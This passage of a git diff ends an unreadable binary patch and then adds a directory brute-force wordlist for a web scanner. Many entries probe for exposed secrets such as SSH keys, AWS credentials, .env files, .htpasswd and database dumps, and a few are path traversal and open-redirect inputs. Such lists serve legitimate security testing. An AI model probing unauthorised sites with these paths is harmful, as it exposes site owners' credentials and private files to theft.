zFrsaoD*>DWZQeMWY>+xTl$jgu{ax<nMQ#*VsW+JS1@MnN<-ytpQUgve6eg7yBpsF=
z<9F<Lz5i>0W7)#9r85ASSuuW9*2OdIL`_(HsK}Y{MhdSZ+1pc_7NQ^P<WfJjQ~N{4
zye>vN07f01yJWUNr;^laQ!m=EqS<)&i|gjfr)0GQZ@`ix9C=^v6@05F*F}s64%oyK
zq;n)*e4q*z`~D_~jF;~NCxs~BNg+HrCP~8F`%~%58n|11zmsHsbeALQt0VveShZaW
z4RWoGU2iHb61DHx(0Ep%c2I#Mbu=+debQklmGY4%Owd)y*B}NC3}~~|IxVu;<vOhT
zwm4o?T4h?c8)FzlPZlk-;uC5a1y&#|E@#36CLCYoQ{ycf7RbdXdU|&vo*W`kd%~=9
z#jS#A!s>a}k95uEc#th1nbbuyOO3jOr#hIDy*mPf(jroRzA_Qhwz0#OPvHhXZU^`X
zy#yp2F2PaSFQ6udE?Fpb7l-c)%2&vx@B2c69fvc7%jr1{aDY+RWeIl&2!ndi`dVjJ
zAGtRMQueYG8D|{`&%yy>TEOHkZ~oR$<2R^#=Bg{>>#B_zC{eH~n`=}FnqO3hU_li<
zGD2#{K%5dWyC%lA-+KrXx32MD{9MkjZmP$2(+u>K!cB6ToG4$8p#LVJ#15eV#sU0)
zTn}THJ7&u~{aXL<%^VmuAB4qvHK8n~Tw94;LKuUg!u{#F{cDh??HC9!9}oC8P%)1`
zibE#0qYX2@6tC`j5i1?qasD6@Q%dvjz9befBPv<)Ex$87a<{Q+h!o69qH2IT4S&@S
z9t^o_WaN=1FC|vzUN&<-7cBeUT46qf2Ga~t1QL#4d@0K4;W$9+VK}+zCD3HQcOf#)
z5+gI<wnDnwi)HIw=;firWR4?k)H1v&ora~T1d}lNP%HZmP9l+}+XuZe@wD|N%?aIi
zYLG-6WO+f&2isN5nm%kN;{XJ8g1pMyo<?>J?+3M*3aHZe&#5Lj(wu&|^;_^TD%MKm
zagy<$Q4w1nk0RGS$*TxEh)AX=#!Uo37ji>ZdH8K}dYNWijT#n#TY;J5kTPo#ouu^C
zjyJV$vs;42(bbznnUx%?;8!eAiiZ#RlXK>P6UYq?pemKJj>8|A4GIkE@p(2hC$8RS
zAzlyI`tcL=`dIP2uZ<P_x}%-z?chajTBVt%VJACD?I_k7(h;au5EnCxvObdOIp}QO
zW%f6}JnLt2^vRY?w!06Ut=#Sa?h-=l&1{K%f|WK(lsaG+!j%p|px@Ad+wEtDnGz3&
ze*s_c`7&i{7cd-)TBV`y7;4no&LBiTks_v$N9A3^m=_+cAfUQOLPk5zUa7;H0IEAR
z|B@b~?a|b_0hJ!^x&?Pw@u);b`*|{2Ah};22u^TOjcki#9Nr8kpUCakO0cR>iR+-m
z9|8*|%x7kgnZs5{#%k7@b=i0UDr=FfXLwn|8W;e)r06-5_@Qi*tMZ4EtK1MiZR$_#
z5&G^yhU(8bkYQ^n$nf9uDn-qW#?<g4IGF!Ms7u?w&cyq+<(bFjve)~sUyg}kLGkkt
z)q1@<+i_93mr{!f=#40+6@|z<>__JtQVav+4Ue+N%m+ez!XiVm35*U9Y!jw=A&Y`c
zo7}D*Os5Zo9tNMN{e=MpM+ue0(AiLg>q8a8%`wp2gT}UL>=%`27&|5OB+%&}6tcDO
zB|3|Hyw;-SH)d9<sbUj_(Ykbzg@Hcb+f*(0GbZ$%2G}bmIN(5~zpyZ!?bKU@^C)Jq
zlo+-1=(W1b`JyS4p!iWM7gZepziH602r*hs(`4kDQB#B9XQoIXtv&X8vN{pFqk@4-
zz3asb0s?s1&FKVTaZZ@*>XrZ;6R^Tq<uU<~45(*xn3)x}VGX3&K(yLEM2o14(XmZ_
z7%FQS`~oBiE+oK3r)C2^g+`(p%l{e5`*bU8V%pTu=Xy_M=7O)1tm4G8pq9*(hh>7J
zOZu@@=*hFsZubK%u(P2(58d19SEh$$U4IFjvUm5)=k5pKBBUIM2hSsL&VdVY7YTWf
z&A+m@SfFd%C_iE}m+=}0=vaEk{adu-Sh*CpL}!?%#pTcy?@gFx+_rvl+`GB;%Yt2)
zu?iV3q@3_@W!jrn8lziSf^1aVanO@N6XXhufLeEoiFp|qsQ;lnME6Jg3bi0ET2t5#
zV^0MC!{#&*R9h_(w4pY}XB<64By6D)&}hcU8OP$FIsP+|BBVZB#3YczF5-e1dOA%$
zkC0_94E0hIgdIZURV=-~&=q|og(kr?@w{2g4yUZ}&X~zNUPmoM9v?sCtA@ZB80NLP
zb)zKr*X^4nAWvO>2PIZZt44V_NZNqOoe_4lV(AG%=<c5oG@7D_yZmNKT9|~QZX!`7
zXtnW)jOVEh4@MI)df+(5*ldu4z~=EQ(&I640kv!c878$ISv+f&k)#RfaScc>Gu6N^
zAg<Qyg2M)Oc4W5fw5{1cXQ0@eXnJ-Imjffo5&w2n6&z*G_9~<HSn&X7(U)c4TZ7Km
zm+ZLk1xaospu))GMUx7m5VOU@+RV#=X)jy%hLAWPPznzA=wbvAW&IF#%A1T#F{T|A
zd2THOc~X(nO>;fH&Xs9_lW@wCJ2pYFA+73*lnq{iBtL1IKK%s}2*>=TAxtC^#gG-o
zS6|y9G`MYm->VxG^vqVSH1U!P**0-oRvl)05ztzJa2<+>{GiRjD>2ZZ2H(z@XFb>T
z6U!=ZhxtG5Nqic4F%YoNmSmR$0b|AVXYTo<+1j{)_x6uW7Zb*vxK|xI$JQim>Tr((
z9d$-h_81H(a4Jms!H)sgUMNI(+W-*4hS-q7Q2<JtkF46w&`VHc+3eJr5-*SLaOtaY
z6bVZ~0hpY?je^L8ZKFq=Ew!*-L+>5>8^8o}cx7{th%`8XXc?BS!<bYsz(>rIAmk!A
z8YOdb84{5Pt-dp6@0R^XvEo=IneA2+tqZnQnj?h_0;W|9BR2ul>{+k~NDeq9&`9>}
zwC1Bg)`-saSzQ}(AEV=6^qn+cLgL5lK`~ECZ4kdofXH4DbZy7Xq7+HFQ<`)Zp}ev?
zI7r%&tgO-%SiMkfwjz6G)dj%RytGp|m!cnv%LdT_2cbt2v=PLHdniUsHwxVXI&`6d
z*baC2BZeDBZX2;pbDIjrANVlnAb6e~io|8^_&I;UP%pz%^9sF5(6DlqTs&t&|L47<
z1v0>jk4W}hZ@9Reh>pSsG<Xd!)WMrylZK$A9!N8Axt`u<^q9-uOL3^os?B70<lNxZ
z(_27{44g~s0%Z7heZsM#*b5?&`^qnV@@&|SuRGh?f>sY!&38c~w57aG2eDv~v5w6W
zM(FTmyzAry5R=cT=(dh$=^c9+Fu`@<VQIB!szs9Tl^X`LQj#qIzfl}M7Y?LD{35sp
zaT`is-eo~9;qcUOI`!JnmwvZ`i>=P=Bn2PUK(zknZ~AZnGLV;Ikk1e)xrOd@s$q`C
z3MS}bgrFY1>AOJ9)HOHMXNwxHU6{4OKUQv`054c&KexU21E`GdB`9UI+h#7Gxk8JE
zt}0nEAc1T%fw*BZQ+0EzUF~!g!QrtED!-)X@S*sqxdO)FsvN@KA1{?HM@7oeAi0!_
zE{yJ90Dy3vU_TLoanzxrIpco2<@dXF;H?ax-X48SIPsuoGb3s>8s05EK2S(-*~<hN
ztr4ELi)tM<Y#N&zdH~O2X7mq;a>Yk#zbSa5lXh8o$~>Erj0(+N9W7B<BY|1ts`WXq
z=<R43eD}^tARGvMdK~a+_7xZ>d6ku|Y;fgR*@7EdNUN?oKPFEtJ|P0F?SH84IE7*b
z6r}373|)`<qkg8meZ%pi=uX%v>>^=|Q;&F&SLBu3*mM1pP;HU-04yXf<v&<JM7#Hb
z?B6PIvA@^kh|TtP{Ort>;Qx`%qLM}=If{h0C~*GdGq4~vM`V}cooflcGU!j<XB)8;
zT>*&ZQwK0&CuOp0QiBSIRT@Ync=dKZh$|RJ<I|6kD%#3If$Q(s`e(O3_1E#nLa*O3
zWnZMLO$FXba+Rl-67nJOdVvuOIzwGleYQsL(W=dE{}!7U)NgesNXo*NN!ld<X1Hv2
zs7lP6lu=tY$CY<OdlySlTA0a=Q{jsGH)$+uShX9ONaX#@E(#dUh50wAMEJOME!+Nx
zFHg<+$XUxI%N>HJrSs;%2~F%L;M(+~q5_<eJ}!a=j<*QY+!!~sce4caX~l@*r4juP
zhXQi?5=g%kJ!&dldR~E|rjoCZlqrfYMfynLqo7iy$CW8cDt-M)N%^?g=w>yYGD4?r
zy$Mk$bk417Y+%ZaF1%g*&Bf=%pxe~=ln8yg@l8aD(D@tGs1CT;bd#D-IiXW-bZ;gU
zA3b*4Ee(f~(DNIqL6jaH<o1VX1pXI0-Kd6BM(Eb9HzNv#-fy9XqHy%m4Qf6`guZTn
zgLFV*yPLai5@kmxxwWQdIe#(kzFv+MYSg1FsKedVQDKczluLE`7dTRIql99q(_d_Z
z#@Khs5F>Ibi-34Kx`5Zlk{-Oh>_$G{`(cIS`jI*be3^vZZt_I|!r8ZrA)%8djDeZ{
z$5w%=a~Z^4nBfr|lK{VHx2UEySJ@du9(BRi`L?2DpRzOF{!LYVyGPqDVY-r9OqT2J
zU@RZR`h$j}+3yxt!tUu<j&q`eZZ%#!HOcf`!PvGh?_YgCDHSJ;ob(DI3_G~AyHqgL
z4R*+v#dlhI`UISS6yIJBjfvVaQlgghoQX3Lj|V4SkJ=FGSpkl79+jEVItU<wIKH5L
z-e7wp$l>%9#F4jp!DKiBPwulrmcKHK$pPv)MLbqJW@0-9E}h0Ize|)KwI2#02AoQ#
zUU|m@9VeujhkC;p9yq%liOmNXE(P~K;xIUD!f_v~ozAL9-m}YDq8*4yIW+6(LJhTo
zE~B%;q9AIOMsQ(}$+7l1fOd=9<9~42e7aXBWWPmX`{4Wc_$g_!!9si<QW7uc7>Ler
z#Yvu<Yg8|R?N^X~loe$W5d;foY78Z0&^KW*fIeC%f=c#Y*>DF2MO>3<J7jfF7>3Vl
z`1JTj&<ul!eeLRT!%C7jD_!%?BkBHdS$*j*3`n>d*W+D-KqROZqb~a=utUgKJ3o;a
z8K~Zc=9se)YaJABmYpm_r4#YsTzw(YW3E&v^lvF-0+WsEQ6(2z?|Vv4MaW4r%oz2S
z$GnOq+Z=;ZXbT4mh$>SPQ4a*uSwni~I=^}a%A}!2ryC%?XI&T_O9FC1up+3$@8U5w
zhT{rfn~jNCizCg55Pbv<=E*B~tR7Su_(hMorjSF5@uQSq!~`ggW$gp7q!5$JQv}7_
z@zdybF9o4Kfz4}gPFJ<#Mg<ZcPB9&}aXFH^Y5WWZ#ZYnN!$f~8y>KBx7oT!k+x{up
zRyNBvOA8V%uBbS$NC0vEQBLD^j+*{f$1zyD#px&zpD9h<aS>y8XiHUkv>L2c?*9DS
zQd@5O@5&%l$aq6l)YAm}XuMTbT3C0l7h?sz%mZ2(xpKh&3**sXNk!<zxI3#8VyQAe
zCxG83#RDNs1!5xji(%0WSuj-~m^h57Gj<R*K<9?}Mmj5mGDOXziDd&SQACf})iq@A
z18IsCF}UlrG?9g}qlwc=yoD=t%312^aNtfflT-h=6`Pogn;yP}PQ|3*yk`W>l}KR$
zGE}K_Rp6s;7@~TV#_Bvr2`n!eHX_q7aS9^Z8$-665tH%=7$+Cnuos8tsS;9Y2S<bO
zO$t;W7u1tG`VDJ64sG7ka2aS>#53^%*%Doz8kt#6Tk{IDAH4@eX8#jpI5LSq2)m4X
za-d&>CYaK|L~`Asy$l8iOYrouzsm2x*t>RlhNihP_VcR~gz9!u<<#}SXX0;8@&NJ`
zaShxHv_n<y)W^Nh|H~IoQe0~Ju-wNkuW||ATcblHLcj~YGNs@5!hHLTgx!5I$mpc7
z3hZ5C`X_RVOV%R@MMm~MX6ys#{KLBVw>|?(Z@Td`4yRoYA;pqx8g4l2+z7>3s?Bbd
zJk)2nb6O&zypF}xK<=zS!Rmu7RSONnC4lyc5gZqPmvDr*4s(|~iw6gg3@H~8@IxcX
z{3?8EG~O~P!LozMQpi(<5IATd(?k2m8-)A!Ozp}JL$iT_=kSM{PoSmQDGH~n<}QI2
zr^T4KnQXnN+)5}KK2A7~*k|l9G00u%gZsly`Y;y9p>#fe&>{0c<AC`-_)`MJUZBg!
zQs@bFR2(IN+P?^ka-nmnH!yY`l}>yI?~I&i@EN=|%nNko|4SM52lR3d!O{s@grlVa
HRS^+QjbRL&

literal 0
HcmV?d00001

diff --git a/db/directory-bruteforces.txt b/db/directory-bruteforces.txt
new file mode 100644
index 00000000..aec7f97a
--- /dev/null
+++ b/db/directory-bruteforces.txt
@@ -0,0 +1,5339 @@
+!.gitignore
+!.htaccess
+!.htpasswd
+%20../
+%2e%2e//google.com
+%2e%2e;test/
+%3f/
+%C0%AE%C0%AE%C0%AF
+%ff/
+..;/
+.7z
+.access
+.addressbook
+.adm
+.admin
+.apache.env
+.apdisk
+.AppleDB
+.AppleDesktop
+.AppleDouble
+.apt_generated/
+.architect
+.aws/credentials
+.axoCover/
+.babelrc
+.backup
+.bak
+.bash_history
+.bash_logout
+.bash_profile
+.bashrc
+.bower-cache
+.bower-registry
+.bower-tmp
+.bower.json
+.build/
+.buildpacks
+.buildpath
+.buildpath/
+.builds
+.bundle
+.bundle/
+.byebug_history
+.bz2
+.bzr/
+.bzr/README
+.c9/
+.c9revisions/
+.cabal-sandbox/
+.cache
+.cache/
+.canna
+.capistrano
+.capistrano/
+.capistrano/metrics
+.capistrano/metrics/
+.cask
+.cc-ban.txt
+.cc-ban.txt.bak
+.cfg
+.cfignore
+.checkstyle
+.circleci/
+.circleci/.firebase.secrets.json
+.circleci/.firebase.secrets.json.enc
+.circleci/config.yml
+.classpath
+.cobalt
+.codeclimate.yml
+.codeintel
+.codekit-cache
+.codio
+.coffee_history
+.compile
+.composer
+.concrete/DEV_MODE
+.conf
+.config
+.config.php.swp
+.config/
+.config/filezilla/sitemanager.xml.xml
+.config/psi+/profiles/default/accounts.xml
+.configuration.php.swp
+.consulo/
+.contracts
+.coq-native/
+.core
+.coverage
+.cpan
+.cpanel/
+.cpcache/
+.cproject
+.cr/
+.csdp.cache
+.cshrc
+.CSV
+.csv
+.CVS
+.cvs
+.cvsignore
+.dart_tool/
+.dat
+.database.env
+.db.env
+.db.xml
+.db.yaml
+.debug.env
+.deployignore
+.dev/
+.devcontainer
+.directory
+.django.env
+.dockerignore
+.drone.yml
+.DS_Store
+.dub
+.dump
+.eclipse
+.editorconfig
+.eggs/
+.elastic.env
+.elasticbeanstalk/
+.elb
+.elc
+.emacs
+.emacs.desktop
+.emacs.desktop.lock
+.empty-folder
+.env
+.env.backup
+.env.bak
+.env.copy
+.env.dev
+.env.dev.local
+.env.development
+.env.development.local
+.env.development.sample
+.env.docker
+.env.docker.dev
+.env.local
+.env.new
+.env.php
+.env.prod
+.env.prod.local
+.env.production
+.env.production.local
+.env.remote
+.env.sample.php
+.env.staging
+.env.test.sample
+.environment
+.error_log
+.eslintcache
+.eslintignore
+.eslintrc
+.espressostorage
+.eunit
+.external/
+.external/data
+.externalNativeBuild
+.externalToolBuilders/
+.fake/
+.FBCIndex
+.fetch
+.fhp
+.filemgr-tmp
+.filezilla/
+.filezilla/sitemanager.xml.xml
+.fishsrv.pl
+.flac
+.flowconfig
+.fontconfig/
+.fontcustom-manifest.json
+.forward
+.ftp
+.ftp-access
+.ftppass
+.ftpquota
+.gem
+.gfclient/
+.gfclient/pass
+.git
+.git-credentials
+.git-rewrite/
+.git/
+.git/config
+.git/HEAD
+.git/index
+.git/logs/
+.git/logs/HEAD
+.git/logs/refs
+.git2/
+.git_release
+.gitattributes
+.gitconfig
+.gitignore
+.gitignore.swp
+.gitignore_global
+.gitignore~
+.gitk
+.gitkeep
+.gitlab
+.gitlab-ci.yml
+.gitlab/issue_templates
+.gitlab/merge_request_templates
+.gitlab/route-map.yml
+.gitmodules
+.gitreview
+.gradle
+.gradle/
+.gradletasknamecache
+.grunt
+.grunt/
+.gtkrc
+.guile_history
+.gwt-tmp/
+.gwt/
+.gz
+.hash
+.hg
+.hg/
+.hg/dirstate
+.hg/requires
+.hg/store/data/
+.hg/store/undo
+.hg/undo.dirstate
+.hgignore
+.hgignore.global
+.hgrc
+.histfile
+.history
+.hpc
+.hsenv
+.ht_wsr.txt
+.hta
+.htaccess
+.htaccess-dev
+.htaccess-local
+.htaccess-marco
+.htaccess.BAK
+.htaccess.bak
+.htaccess.bak1
+.htaccess.old
+.htaccess.orig
+.htaccess.sample
+.htaccess.save
+.htaccess.txt
+.htaccess_extra
+.htaccess_orig
+.htaccess_sc
+.htaccessBAK
+.htaccessOLD
+.htaccessOLD2
+.htaccess~
+.HTF/
+.htgroup
+.htpasswd
+.htpasswd-old
+.htpasswd_test
+.htpasswds
+.httr-oauth
+.htusers
+.hypothesis/
+.idea
+.idea/
+.idea/.name
+.idea/caches
+.idea/compiler.xml
+.idea/copyright/profiles_settings.xml
+.idea/dataSources.ids
+.idea/dataSources.local.xml
+.idea/dataSources.xml
+.idea/deployment.xml
+.idea/dictionaries
+.idea/drush_stats.iml
+.idea/encodings.xml
+.idea/gradle.xml
+.idea/libraries
+.idea/misc.xml
+.idea/modules.xml
+.idea/scopes/scope_settings.xml
+.idea/Sites.iml
+.idea/sqlDataSources.xml
+.idea/tasks.xml
+.idea/uiDesigner.xml
+.idea/vcs.xml
+.idea/WebServers.xml
+.idea/woaWordpress.iml
+.idea/workspace(2).xml
+.idea/workspace(3).xml
+.idea/workspace(4).xml
+.idea/workspace(5).xml
+.idea/workspace(6).xml
+.idea/workspace(7).xml
+.idea/workspace.xml
+.idea0/
+.idea_modules/
+.ignore
+.ignored/
+.import/
+.influx_history
+.ini
+.inst/
+.install/
+.install/composer.phar
+.installed.cfg
+.ipynb_checkpoints
+.jekyll-cache/
+.jekyll-metadata
+.jestrc
+.joe_state
+.jpilot
+.jscsrc
+.jshintignore
+.jshintrc
+.jsp
+.JustCode
+.kde
+.keep
+.keys.yml
+.kitchen.local.yml
+.kitchen.yml
+.kitchen/
+.komodotools
+.komodotools/
+.ksh_history
+.laravel.env
+.last_cover_stats
+.lein-deps-sum
+.lein-failures
+.lein-plugins/
+.lein-repl-history
+.lesshst
+.lia.cache
+.libs/
+.lighttpd.conf
+.listing
+.listings
+.loadpath
+.local
+.LOCAL
+.localcache/
+.localeapp/
+.localsettings.php.swp
+.lock-wscript
+.log
+.log.txt
+.login
+.login_conf
+.LSOverride
+.lynx_cookies
+.m2/settings.xml
+.magentointel-cache/
+.mail_aliases
+.mailrc
+.maintenance
+.maintenance2
+.mc
+.mc/
+.members
+.memdump
+.mergesources.yml
+.merlin
+.meta
+.metadata
+.metadata/
+.metrics
+.modgit/
+.modman
+.modman/
+.modules
+.mono/
+.mr.developer.cfg
+.msi
+.mtj.tmp/
+.mvn/timing.properties
+.mweval_history
+.mwsql_history
+.mypy_cache/
+.mysql.env
+.mysql_history
+.nano_history
+.navigation/
+.nbproject/
+.netrc
+.netrwhist
+.next
+.nginx.env
+.nia.cache
+.nlia.cache
+.node_repl_history
+.nodelete
+.npm
+.npmignore
+.npmrc
+.nra.cache
+.nrepl-port
+.nsconfig
+.nsf
+.ntvs_analysis.dat
+.nuget/
+.nuget/packages.config
+.nyc_output
+.old
+.old.env
+.oldsnippets
+.oldstatic
+.org-id-locations
+.ost
+.packages
+.paket/
+.pass
+.passes
+.passwd
+.password
+.passwords
+.passwrd
+.patches/
+.pdf
+.perf
+.pgadmin3
+.pgpass
+.pgsql_history
+.php-ini
+.php-version
+.php_history
+.phpintel
+.phpstorm.meta.php
+.phptidy-cache
+.phpversion
+.pki
+.placeholder
+.postgres.env
+.powenv
+.pre-commit-config.yaml
+.procmailrc
+.production
+.profile
+.project
+.project.xml
+.project/
+.projectOptions
+.properties
+.psci
+.psci_modules
+.psql_history
+.psqlrc
+.pst
+.pub/
+.pwd
+.pydevproject
+.pylintrc
+.pytest_cache/
+.Python
+.python-eggs
+.python-history
+.python-version
+.qmake.cache
+.qmake.stash
+.qqestore/
+.Rapp.history
+.rar
+.raw
+.rbtp
+.RData
+.rdsTempFiles
+.rebar
+.rediscli_history
+.reek
+.remote
+.remote-sync.json
+.repl_history
+.revision
+.Rhistory
+.rhost
+.rhosts
+.robots.txt
+.rocketeer/
+.ropeproject
+.Rproj.user/
+.rspec
+.rsync-filter
+.rsync_cache
+.rsync_cache/
+.rubocop.yml
+.rubocop_todo.yml
+.ruby-gemset
+.ruby-version
+.rvmrc
+.s3backupstatus
+.sass-cache/
+.scala_history
+.sconsign.dblite
+.scrapy
+.scrutinizer.yml
+.selected_editor
+.settings
+.settings.php.swp
+.settings/
+.settings/.jsdtscope
+.settings/org.eclipse.core.resources.prefs
+.settings/org.eclipse.php.core.prefs
+.settings/org.eclipse.wst.common.project.facet.core.xml
+.settings/org.eclipse.wst.jsdt.ui.superType.container
+.settings/org.eclipse.wst.jsdt.ui.superType.name
+.sh
+.sh_history
+.shrc
+.sln
+.smileys
+.smushit-status
+.spamassassin
+.spyderproject
+.spyproject
+.sql
+.sql.bz2
+.sql.gz
+.sqlite_history
+.src/app.js
+.src/index.js
+.src/server.js
+.ssh
+.ssh.asp
+.ssh.php
+.ssh/
+.ssh/authorized_keys
+.ssh/id_dsa
+.ssh/id_rsa
+.ssh/id_rsa.key
+.ssh/id_rsa.key~
+.ssh/id_rsa.priv
+.ssh/id_rsa.priv~
+.ssh/id_rsa.pub
+.ssh/id_rsa.pub~
+.ssh/id_rsa~
+.ssh/know_hosts
+.ssh/know_hosts~
+.ssh/known_host
+.ssh/known_hosts
+.st_cache/
+.stack-work/
+.style.yapf
+.stylelintrc
+.sublime-gulp.cache
+.sublime-project
+.sublime-workspace
+.subversion
+.sucuriquarantine/
+.sunw
+.svn
+.svn/
+.svn/all-wcprops
+.svn/entries
+.svn/text-base/
+.svn/text-base/index.php.svn-base
+.svnignore
+.sw
+.swf
+.swo
+.swp
+.SyncID
+.SyncIgnore
+.synthquota
+.system/
+.tags
+.tar
+.tar.bz2
+.tar.gz
+.tconn/
+.tconn/tconn.conf
+.temp
+.temp/
+.texpadtmp
+.tfignore
+.tgitconfig
+.thumbs
+.tmp
+.tmp_versions/
+.tmproj
+.tox
+.tox/
+.transients_purge.log
+.Trash
+.Trashes
+.travis.yml
+.tx/
+.txt
+.user.ini
+.users
+.vacation.cache
+.vagrant
+.venv
+.version
+.vgextensions/
+.viminfo
+.vimrc
+.vs/
+.vscode
+.vscode/sftp.json
+.web
+.web-server-pid
+.web.env
+.webassets-cache
+.workspace/
+.wp-config.php.swp
+.www_acl
+.wwwacl
+.yardoc/
+.yarn-integrity
+.yo-rc.json
+.zeus.sock
+.zfs/
+.zip
+.zsh_history
+.zshrc
+/api-doc
+/api-docs
+/api.html
+/api.json
+/api.yaml
+/api.yml
+/api/2/explore/
+/api/docs
+/api/package_search/v4/documentation
+/api/swagger
+/api/swagger-resources
+/api/swagger-ui
+/api/swagger-ui.html
+/api/swagger.json
+/api/swagger.yaml
+/api/swagger.yml
+/api/swagger/v2/api-docs
+/api/swagger/v3/api-docs
+/api/v1/api-docs
+/api/v1/documentation
+/api/v2/api-docs
+/api/v2/documentation
+/api/v2/swagger.json
+/api/v3/api-docs
+/api/v3/documentation
+/api/v3/swagger.json
+/apidoc
+/apidocs
+/application
+/backoffice/v1/ui
+/build/reference/web-api/explore
+/classicapi/doc/
+/core/latest/swagger-ui/index.html
+/csp/gateway/slc/api/swagger-ui.html
+/doc
+/docs
+/documentation/swagger-ui
+/documentation/swagger-ui.html
+/documentation/swagger.json
+/documentation/swagger.yaml
+/documentation/swagger.yml
+/internal/docs
+/loki/api/v1/label
+/loki/api/v1/label/pod/values
+/openapi.json
+/rest/v1
+/rest/v3/doc
+/swagger
+/swagger-resources
+/swagger-resources/configuration/security
+/swagger-resources/configuration/ui
+/swagger-ui.html
+/swagger-ui.html/v2/api-docs
+/swagger-ui.html/v3/api-docs
+/swagger-ui/
+/swagger-ui/index.html
+/swagger.json
+/swagger.yaml
+/swagger.yml
+/swagger/index.html
+/swagger/swagger-ui.html
+/swagger/v2/api-docs
+/swagger/v3/api-docs
+/swaggerui
+/ui
+/ui/
+/v1
+/v1.0
+/v1.1
+/v1.x/swagger-ui.html
+/v2
+/v2.0
+/v2/api-docs
+/v3
+/v3/api-docs
+0.htpasswd
+0.php
+0admin/
+0manager/
+1.7z
+1.htaccess
+1.htpasswd
+1.php
+1.rar
+1.sql
+1.tar
+1.tar.bz2
+1.tar.gz
+1.txt
+1.zip
+10-flannel.conf
+111.php
+123.php
+123.txt
+1c/
+1c_exchange.php
+2.php
+2.sql
+2.txt
+2010.sql
+2010.tar
+2010.tar.bz2
+2010.tar.gz
+2010.tgz
+2010.zip
+2011.sql
+2011.tar
+2011.tar.bz2
+2011.tar.gz
+2011.tgz
+2011.zip
+2012.sql
+2012.tar
+2012.tar.bz2
+2012.tar.gz
+2012.tgz
+2012.zip
+2013.sql
+2013.tar
+2013.tar.bz2
+2013.tar.gz
+2013.tgz
+2013.zip
+2014.sql
+2014.tar
+2014.tar.bz2
+2014.tar.gz
+2014.tgz
+2014.zip
+2015.sql
+2015.tar
+2015.tar.bz2
+2015.tar.gz
+2015.tgz
+2015.zip
+2016.sql
+2016.tar
+2016.tar.bz2
+2016.tar.gz
+2016.tgz
+2016.zip
+2017.sql
+2017.tar
+2017.tar.bz2
+2017.tar.gz
+2017.tgz
+2017.zip
+2018.sql
+2018.tar
+2018.tar.bz2
+2018.tar.gz
+2018.tgz
+2018.zip
+2019.sql
+2019.tar
+2019.tar.bz2
+2019.tar.gz
+2019.tgz
+2019.zip
+2020.sql
+2020.tar
+2020.tar.bz2
+2020.tar.gz
+2020.tgz
+2020.zip
+2021.sql
+2021.tar
+2021.tar.bz2
+2021.tar.gz
+2021.tgz
+2021.zip
+2022-backup.zip
+2022.sql
+2022.tar
+2022.tar.bz2
+2022.tar.gz
+2022.tgz
+2022.zip
+2023-backup.zip
+2023.sql
+2023.tar
+2023.tar.bz2
+2023.tar.gz
+2023.tgz
+2023.zip
+2024-backup.zip
+2024.sql
+2024.tar
+2024.tar.bz2
+2024.tar.gz
+2024.tgz
+2024.zip
+2phpmyadmin/
+3.php
+4.php
+5.php
+6.php
+7.php
+7788.php
+8.php
+8899.php
+9.php
+9678.php
+\..\..\..\..\..\..\..\..\..\etc\passwd
+_.htpasswd
+__admin
+__bx_log.log
+__cache/
+__dummy.html
+__history/
+__index.php
+__init__.py
+__MACOSX
+__main__.py
+__php_errors.log
+__pma___
+__pycache__/
+__recovery/
+__SQL
+__test.php
+__web_console/
+_adm
+_admin
+_book
+_build
+_build/
+_cache/
+_common.xsl
+_config.inc
+_data/
+_data/error_log
+_debugbar/open
+_Dockerfile
+_errors
+_eumm/
+_files
+_fragment
+_h5ai/
+_include
+_index.php
+_install
+_internal
+_layouts
+_layouts/
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+_log/
+_log/access-log
+_log/access.log
+_log/access_log
+_log/error-log
+_log/error.log
+_log/error_log
+_logs
+_logs/
+_logs/access-log
+_logs/access.log
+_logs/access_log
+_logs/err.log
+_logs/error-log
+_logs/error.log
+_logs/error_log
+_LPHPMYADMIN/
+_mmServerScripts/
+_mmServerScripts/MMHTTPDB.asp
+_mmServerScripts/MMHTTPDB.php
+_notes/
+_notes/dwsync.xml
+_novo/
+_novo/composer.lock
+_old
+_pages
+_php_errors.log
+_phpmyadmin/
+_pkginfo.txt
+_private
+_proxy
+_Pvt_Extensions
+_site/
+_source
+_SQL
+_sqladm
+_src
+_TeamCity
+_test
+_thumbs/
+_tracks
+_UpgradeReport_Files/
+_vti_bin/
+_vti_bin/_vti_adm/admin.dll
+_vti_bin/_vti_aut/author.dll
+_vti_bin/shtml.dll
+_vti_pvt/
+_vti_pvt/service.pwt
+_vti_pvt/users.pwt
+_WEB_INF/
+_wl_cls_gen.jar
+_wpeprivate
+_wpeprivate/
+_wpeprivate/config.json
+_www
+_yardoc/
+a%5c.aspx
+a.out
+aadmin/
+abs/
+acceptance_config.yml
+acceso
+acceso.php
+access
+access-log
+access-log.1
+access.1
+access.log
+access.php
+access.txt
+access/
+access_.log
+access_log
+access_log.1
+accesslog
+account.html
+account.php
+accounts
+accounts.php
+accounts.sql
+accounts.txt
+accounts.xml
+accounts/
+acct_login/
+activemq/
+activity.log
+actuator
+actuator/dump
+actuator/env
+actuator/logfile
+actuator/mappings
+actuator/trace
+ad_login
+ad_manage
+add.php
+add_admin
+adfs/services/trust/2005/windowstransport
+adm
+adm.html
+adm.php
+adm/
+adm/admloginuser.php
+adm/index.html
+adm/index.php
+adm_auth
+adm_auth.php
+admin
+admin%20/
+admin-authz.xml
+admin-console
+admin-console/
+admin-database
+admin-database.php
+admin-database/
+admin-dev/
+admin-dev/autoupgrade/
+admin-dev/backups/
+admin-dev/export/
+admin-dev/import/
+admin-login
+admin-login.html
+admin-login.php
+admin-serv/
+admin-serv/config/admpw
+admin.asp
+admin.aspx
+admin.cfm
+admin.cgi
+admin.conf
+admin.conf.default
+admin.dat
+admin.do
+admin.htm
+admin.htm.php
+admin.html
+admin.html.php
+admin.jsp
+admin.mdb
+admin.passwd
+admin.php
+admin.php3
+admin.pl
+admin/
+admin/.config
+admin/.htaccess
+admin/_logs/access-log
+admin/_logs/access.log
+admin/_logs/access_log
+admin/_logs/err.log
+admin/_logs/error-log
+admin/_logs/error.log
+admin/_logs/error_log
+admin/_logs/login.txt
+admin/access.log
+admin/access.txt
+admin/access_log
+admin/account
+admin/account.html
+admin/account.php
+admin/admin
+admin/admin-login
+admin/admin-login.html
+admin/admin-login.php
+admin/admin.html
+admin/admin.php
+admin/admin_login
+admin/admin_login.html
+admin/admin_login.php
+admin/adminLogin
+admin/adminLogin.htm
+admin/adminLogin.html
+admin/adminLogin.php
+admin/backup/
+admin/backups/
+admin/config.php
+admin/controlpanel
+admin/controlpanel.htm
+admin/controlpanel.html
+admin/controlpanel.php
+admin/cp
